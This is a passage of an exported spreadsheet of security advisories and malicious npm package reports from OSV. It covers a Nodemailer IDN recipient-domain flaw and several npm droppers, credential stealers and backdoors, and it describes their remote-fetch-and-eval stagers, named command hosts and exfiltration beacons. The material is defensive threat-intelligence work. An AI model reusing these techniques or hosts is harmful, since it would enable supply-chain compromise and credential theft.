A containerized version that proves the same result against a **real RFC 5321 SMTP server** (`aiosmtpd`) is included alongside this report (`docker compose up --build`, cases `R6`/IDN); the receiving server accepts `RCPT TO:&lt;victim@xn--company-pka.com&gt;` and reports the recipient domain as `xn--company-pka.com`.

### Impact

Any application that uses Nodemailer to send mail to a recipient whose domain is subjected to a security or trust decision made with a *different* (UTS‑46‑conformant) parser, and then trusts Nodemailer to deliver to that domain. This includes:
  * recipient **allow‑list / block‑list / “same corporate domain” checks** implemented with `new URL()`, `url.domainToASCII`, a browser‑side check, or an IDN library;
  * flows that **display or log the normalized recipient domain** for human confirmation (the shown `company.com` differs from the delivered `xn--company-pka.com`);
  * any domain‑gated feature (employee‑only registration, “send only to our tenant”, notification routing).

## Patched in 9.1.0

Domain encoding now applies UTS-46 ([259c32d](https://github.com/nodemailer/nodemailer/commit/259c32d)), so `victim@compa­ny.com` resolves to `company.com`, matching `url.domainToASCII` and browsers.

One caveat on the suggested remediation, hardened in [b212ac4](https://github.com/nodemailer/nodemailer/commit/b212ac4): `url.domainToASCII` is a WHATWG **host parser**, not a pure UTS-46 mapper. It terminates the host at `/`, `\\`, `?` and `#` and percent-decodes. Used unguarded it introduces a worse version of the same weakness, since `user@attacker.example/mail.corp.example` encodes to the deliverable `user@attacker.example` where the bundled Punycode codec left it intact and unroutable. Those characters are now kept away from the mapper.

On severity, "attacker-registrable" is doing significant work in the report: `xn--company-pka.com` decodes to a label containing U+00AD and `xn--mi7cd4afch9d.com` to full-width Latin, neither of which Verisign's IDN tables permit for a .com registration. The misdelivery and the confirmation-UI mismatch stand regardless, which is why this is rated level with the comment issue rather than above it.</t></is></c><c r="T100" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-wmmp-3585-3rmp</t></is></c></row><row r="101"><c r="A101" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B101" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C101" s="5" t="inlineStr"><is><t>MAL-2026-16048</t></is></c><c r="D101" s="5" t="inlineStr" /><c r="E101" s="5" t="inlineStr" /><c r="F101" s="5" t="inlineStr" /><c r="G101" s="5" t="inlineStr" /><c r="H101" s="5" t="inlineStr" /><c r="I101" s="5" t="inlineStr" /><c r="J101" s="5" t="inlineStr" /><c r="K101" s="5" t="inlineStr" /><c r="L101" s="5" t="inlineStr"><is><t>npm:punypump</t></is></c><c r="M101" s="5" t="inlineStr" /><c r="N101" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O101" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P101" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q101" s="5" t="inlineStr" /><c r="R101" s="5" t="inlineStr" /><c r="S101" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6e56cc14096d20f679823bf15af9f44dff039e01f23d2082eba8020200d04a7f)
The package presents itself as a console shim (index.js is a verbatim copy of console-browserify with description 'Emulate console for all the browsers'), but also ships library.js and test/sessionCtrl.js which auto-execute a stager on module load via initializeService().catch(...). The stager fetches an opaque blob from a base64-hidden URL (config.API_GATEWAY = 'aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9WNk5CWA==' decoding to https://www.jsonkeeper.com/b/V6NBX), AES-256-CBC decrypts it with a hardcoded key, and passes the plaintext to eval(). The endpoint URL, HTTP header name, and header value are all base64-encoded in config.js. Content served from the jsonkeeper.com paste is mutable and attacker-controlled, so require('punypump/library') runs arbitrary attacker code on the installer's machine.
</t></is></c><c r="T101" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16048</t></is></c></row><row r="102"><c r="A102" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B102" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C102" s="5" t="inlineStr"><is><t>MAL-2026-16049</t></is></c><c r="D102" s="5" t="inlineStr" /><c r="E102" s="5" t="inlineStr" /><c r="F102" s="5" t="inlineStr" /><c r="G102" s="5" t="inlineStr" /><c r="H102" s="5" t="inlineStr" /><c r="I102" s="5" t="inlineStr" /><c r="J102" s="5" t="inlineStr" /><c r="K102" s="5" t="inlineStr" /><c r="L102" s="5" t="inlineStr"><is><t>npm:tailwindcss-aspectratio-styles</t></is></c><c r="M102" s="5" t="inlineStr" /><c r="N102" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O102" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P102" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q102" s="5" t="inlineStr" /><c r="R102" s="5" t="inlineStr" /><c r="S102" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9b995eb02f80f9037beda9f8a864f55109e054925175289df0c1b29ed8011bc3)
src/index.js, referenced by the package main and executed on require(), performs an HTTP GET to http://tailwindlan.online, writes the response body to a sibling file, and immediately require()s that file, giving the operator of tailwindlan.online arbitrary code execution in the installer's Node.js process at import time. The fetch uses plain HTTP with no integrity or signature check, and the domain is unrelated to the tailwindlabs project. The package name resembles the official @tailwindcss/aspect-ratio plugin, and package.json's repository field points at tailwindlabs/tailwindcss-aspect-ratio to mimic the upstream; the legitimate plugin code is preserved verbatim with the remote-fetch-and-execute block appended to the end of the single minified line.
</t></is></c><c r="T102" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16049</t></is></c></row><row r="103"><c r="A103" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B103" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C103" s="5" t="inlineStr"><is><t>MAL-2026-16050</t></is></c><c r="D103" s="5" t="inlineStr" /><c r="E103" s="5" t="inlineStr" /><c r="F103" s="5" t="inlineStr" /><c r="G103" s="5" t="inlineStr" /><c r="H103" s="5" t="inlineStr" /><c r="I103" s="5" t="inlineStr" /><c r="J103" s="5" t="inlineStr" /><c r="K103" s="5" t="inlineStr" /><c r="L103" s="5" t="inlineStr"><is><t>npm:@aspect-adv-ui/consent-manager</t></is></c><c r="M103" s="5" t="inlineStr" /><c r="N103" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O103" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P103" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q103" s="5" t="inlineStr" /><c r="R103" s="5" t="inlineStr" /><c r="S103" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b30b507d6c71f746b0af2d19cbbb85357f15189e7e93118c75b4cb215adc0ece)
@aspect-adv-ui/consent-manager 2.4.1 declares a postinstall hook (`node setup.js`) that fires automatically on every `npm install`. setup.js issues an HTTPS GET to a hardcoded webhook.site inspection endpoint (https://webhook.site/kapper), sending install-event metadata (source IP, TLS/user-agent fingerprint) to an author-controlled third-party collector. The package is advertised as a small GDPR/CCPA consent-bar React component with no native build, no binary, and no legitimate install-time work; the postinstall exists solely to run this beacon. webhook.site is a public request-inspection service commonly used as an anonymous exfiltration/beacon endpoint, and the beacon is not disclosed or opt-in.
</t></is></c><c r="T103" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16050</t></is></c></row><row r="104"><c r="A104" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B104" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C104" s="5" t="inlineStr"><is><t>MAL-2026-16051</t></is></c><c r="D104" s="5" t="inlineStr" /><c r="E104" s="5" t="inlineStr" /><c r="F104" s="5" t="inlineStr" /><c r="G104" s="5" t="inlineStr" /><c r="H104" s="5" t="inlineStr" /><c r="I104" s="5" t="inlineStr" /><c r="J104" s="5" t="inlineStr" /><c r="K104" s="5" t="inlineStr" /><c r="L104" s="5" t="inlineStr"><is><t>npm:@umschool/analytics</t></is></c><c r="M104" s="5" t="inlineStr" /><c r="N104" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P104" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q104" s="5" t="inlineStr" /><c r="R104" s="5" t="inlineStr" /><c r="S104" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (da14c2843514d3c9103335648bc81a8bce18fc173b27c2ab39ebe2c6c0abe028)
@umschool/analytics@999.0.4 targets the internal @umschool npm scope with an implausibly high version number to force resolution over any private package of the same name. Its postinstall.js runs on npm install and collects host identity (os.hostname, os.userInfo, process.cwd), reads /etc/hostname, /etc/hosts, /etc/resolv.conf, and /proc/version, filters process.env for credential-shaped keys matching a broad regex (token/secret/key/pass/aws/db/jwt/auth/etc.), and walks parent directories to read.env and config.* files. Each payload is base64-encoded and transmitted via three HTTPS GET beacons to akko.requestcatcher.com, with an additional hex-encoded DNS beacon of hostname+user to the same domain. A README/comment self-labeling the code as a 'HARMLESS PoC' does not change the observed behavior: credential-shaped environment variables, dotenv files, and internal network configuration leave the installer's build host to a third-party request-catcher.
</t></is></c><c r="T104" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16051</t></is></c></row><row r="105"><c r="A105" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B105" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C105" s="5" t="inlineStr"><is><t>MAL-2026-16052</t></is></c><c r="D105" s="5" t="inlineStr" /><c r="E105" s="5" t="inlineStr" /><c r="F105" s="5" t="inlineStr" /><c r="G105" s="5" t="inlineStr" /><c r="H105" s="5" t="inlineStr" /><c r="I105" s="5" t="inlineStr" /><c r="J105" s="5" t="inlineStr" /><c r="K105" s="5" t="inlineStr" /><c r="L105" s="5" t="inlineStr"><is><t>npm:open-item-validator</t></is></c><c r="M105" s="5" t="inlineStr" /><c r="N105" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O105" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P105" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q105" s="5" t="inlineStr" /><c r="R105" s="5" t="inlineStr" /><c r="S105" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7ba5b55d57f4938bf2494d369d14434bb80ba6f6c712c7f8d89ae773c27dc457)
On require(), index.js spawns a detached, unref'd background Node process (lib/check-items.js) that repeatedly HTTP-GETs a JSON payload from http://itemx.servegame.com:8888/api/x-realtime and executes the returned JavaScript via new Function('require','module', payload.code)(require, moduleObj). The daemon survives the parent process and re-polls the endpoint on a configured interval, so whoever controls that endpoint runs arbitrary Node code on the installer's host on library load and continuously thereafter. The fetch is over plain HTTP to a No-IP dynamic-DNS host (servegame.com) that does not match the publisher's declared homepage (game.spawnrealm.com); a bundled RSA signature check does not alter that the endpoint operator chooses what code runs. README framing as 'signed game code updates' is inconsistent with the shipped generic fetch-and-exec mechanism and the publisher/destination host mismatch.
</t></is></c><c r="T105" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16052</t></is></c></row><row r="106"><c r="A106" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B106" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C106" s="5" t="inlineStr"><is><t>MAL-2026-16056</t></is></c><c r="D106" s="5" t="inlineStr" /><c r="E106" s="5" t="inlineStr" /><c r="F106" s="5" t="inlineStr" /><c r="G106" s="5" t="inlineStr" /><c r="H106" s="5" t="inlineStr" /><c r="I106" s="5" t="inlineStr" /><c r="J106" s="5" t="inlineStr" /><c r="K106" s="5" t="inlineStr" /><c r="L106" s="5" t="inlineStr"><is><t>npm:tailwind-aspect-styles</t></is></c><c r="M106" s="5" t="inlineStr" /><c r="N106" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O106" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P106" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q106" s="5" t="inlineStr" /><c r="R106" s="5" t="inlineStr" /><c r="S106" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (4d63fe1e50dc7d704732a5e92e95f320fcc3fac45c5a0a223ed278f316c2bb14)
The package's main module (src/index.js) performs an https.get to http://23.27.245.100/index.js over plain HTTP, writes the response to./inout.js in the consumer's working directory, and immediately require()s the written file. The fetch is unpinned, unauthenticated, and served from a bare IP over cleartext, so the operator of that endpoint controls arbitrary JavaScript executed in the Node process that loads this package. The package presents itself as the Tailwind aspect-ratio plugin, with a package.json repository field pointing to tailwindlabs/tailwindcss-aspect-ratio, while the dropper is appended after the legitimate-looking plugin export.
</t></is></c><c r="T106" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16056</t></is></c></row><row r="107"><c r="A107" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B107" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C107" s="5" t="inlineStr"><is><t>MAL-2026-16057</t></is></c><c r="D107" s="5" t="inlineStr" /><c r="E107" s="5" t="inlineStr" /><c r="F107" s="5" t="inlineStr" /><c r="G107" s="5" t="inlineStr" /><c r="H107" s="5" t="inlineStr" /><c r="I107" s="5" t="inlineStr" /><c r="J107" s="5" t="inlineStr" /><c r="K107" s="5" t="inlineStr" /><c r="L107" s="5" t="inlineStr"><is><t>npm:toru-ultimate</t></is></c><c r="M107" s="5" t="inlineStr" /><c r="N107" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P107" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q107" s="5" t="inlineStr" /><c r="R107" s="5" t="inlineStr" /><c r="S107" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e6ef8cb6f3ca866b67fa91f2e770c674ddb7d6b110fd671ba98669dc1220510f)
The package's loginViaAPI() function POSTs caller-supplied Facebook email, password, and 2FA Base32 secret to https://minhdong.site/api/v1/facebook/login_ios (a domain unrelated to Facebook, tied to the package's contributor). The response returns Facebook cookies/access_token which are then installed into the caller's session. The README documents login via appState cookies and does not disclose that email/password logins are proxied through minhdong.site. Additionally, package.json declares 'fca-unofficial' as 'github:VangBanLaNhat/fca-unofficial' — an unpinned mutable GitHub reference with no commit SHA. npm install fetches whatever bytes the branch HEAD returns, with no integrity check, and this module is require'd by the bundled E2EE client, so its code runs at import. Whoever controls that GitHub branch controls code delivered to every installer.
</t></is></c><c r="T107" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16057</t></is></c></row><row r="108"><c r="A108" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B108" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C108" s="5" t="inlineStr"><is><t>MAL-2026-16058</t></is></c><c r="D108" s="5" t="inlineStr" /><c r="E108" s="5" t="inlineStr" /><c r="F108" s="5" t="inlineStr" /><c r="G108" s="5" t="inlineStr" /><c r="H108" s="5" t="inlineStr" /><c r="I108" s="5" t="inlineStr" /><c r="J108" s="5" t="inlineStr" /><c r="K108" s="5" t="inlineStr" /><c r="L108" s="5" t="inlineStr"><is><t>npm:vinzz-wcli</t></is></c><c r="M108" s="5" t="inlineStr" /><c r="N108" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O108" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P108" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q108" s="5" t="inlineStr" /><c r="R108" s="5" t="inlineStr" /><c r="S108" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8dec0212466f7170f1e00ecbfe3f846cbf5d211917c3831a6ee162ca6d44ec10)
vinzz-wcli is a WhatsApp CLI whose main entry (index.js) sets `global.ownerr = "6285185667890@s.whatsapp.net"` and treats any incoming WhatsApp message from that JID as coming from an authorized owner. The `messages.upsert` handler routes messages from owners into `handleCommand`, which dispatches to plugins including `cmd` (which calls `child_process.exec` on the message text) and `eval` (which builds and runs an `AsyncFunction` from the message text). When an installer runs the CLI and pairs their own WhatsApp account, the hardcoded third-party number is silently added as an owner and can send arbitrary shell commands and JavaScript to be executed on the installer's host with the installer's privileges. The tarball also ships a second file, index2.js, which is not the declared main but contains the same hardcoded owner JID and the same messages.upsert -&gt; handleCommand dispatch, providing an equivalent execution path if that file is invoked directly.
</t></is></c><c r="T108" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16058</t></is></c></row><row r="109"><c r="A109" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B109" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C109" s="5" t="inlineStr"><is><t>MAL-2026-16199</t></is></c><c r="D109" s="5" t="inlineStr" /><c r="E109" s="5" t="inlineStr" /><c r="F109" s="5" t="inlineStr" /><c r="G109" s="5" t="inlineStr" /><c r="H109" s="5" t="inlineStr" /><c r="I109" s="5" t="inlineStr" /><c r="J109" s="5" t="inlineStr" /><c r="K109" s="5" t="inlineStr" /><c r="L109" s="5" t="inlineStr"><is><t>npm:plogme</t></is></c><c r="M109" s="5" t="inlineStr" /><c r="N109" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O109" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P109" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q109" s="5" t="inlineStr" /><c r="R109" s="5" t="inlineStr" /><c r="S109" s="5" t="inlineStr"><is><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is></c><c r="T109" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16199</t></is></c></row></sheetData><autoFilter ref="A1:T109" /><conditionalFormatting sqref="E2:E109"><cfRule type="cellIs" priority="1" operator="equal" dxfId="0"><formula>"CRITICAL"</formula></cfRule><cfRule type="cellIs" priority="2" operator="equal" dxfId="1"><formula>"HIGH"</formula></cfRule><cfRule type="cellIs" priority="3" operator="equal" dxfId="2"><formula>"MEDIUM"</formula></cfRule><cfRule type="cellIs" priority="4" operator="equal" dxfId="3"><formula>"LOW"</formula></cfRule></conditionalFormatting><conditionalFormatting sqref="G2:G109"><cfRule type="cellIs" priority="5" operator="equal" dxfId="4"><formula>"Yes"</formula></cfRule></conditionalFormatting><hyperlinks><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s><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2026-09-17T11:31:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-17T11:31:58Z</dcterms:modified>
</cp:coreProperties>
</file>